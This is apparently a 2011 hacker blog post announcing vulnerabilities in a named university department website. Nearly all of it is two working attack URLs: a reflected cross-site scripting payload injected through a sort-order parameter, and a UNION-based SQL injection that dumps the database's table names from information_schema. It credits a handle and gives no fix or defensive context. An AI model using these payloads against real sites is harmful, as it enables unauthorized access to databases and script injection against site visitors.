Wednesday, January 19, 2011

english.stanford.edu XSS & Sql Injection-Vul

0




XSS:
http://english.stanford.edu/graduate.php?type=placement&order_by=year_appointed&order=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

SQLI:
http://english.stanford.edu/index.php?news_id=309%20union%20all%20select%201,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()--

Found by: darknessn1k0!a

0 comments:

Post a Comment

About Me

My photo
Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting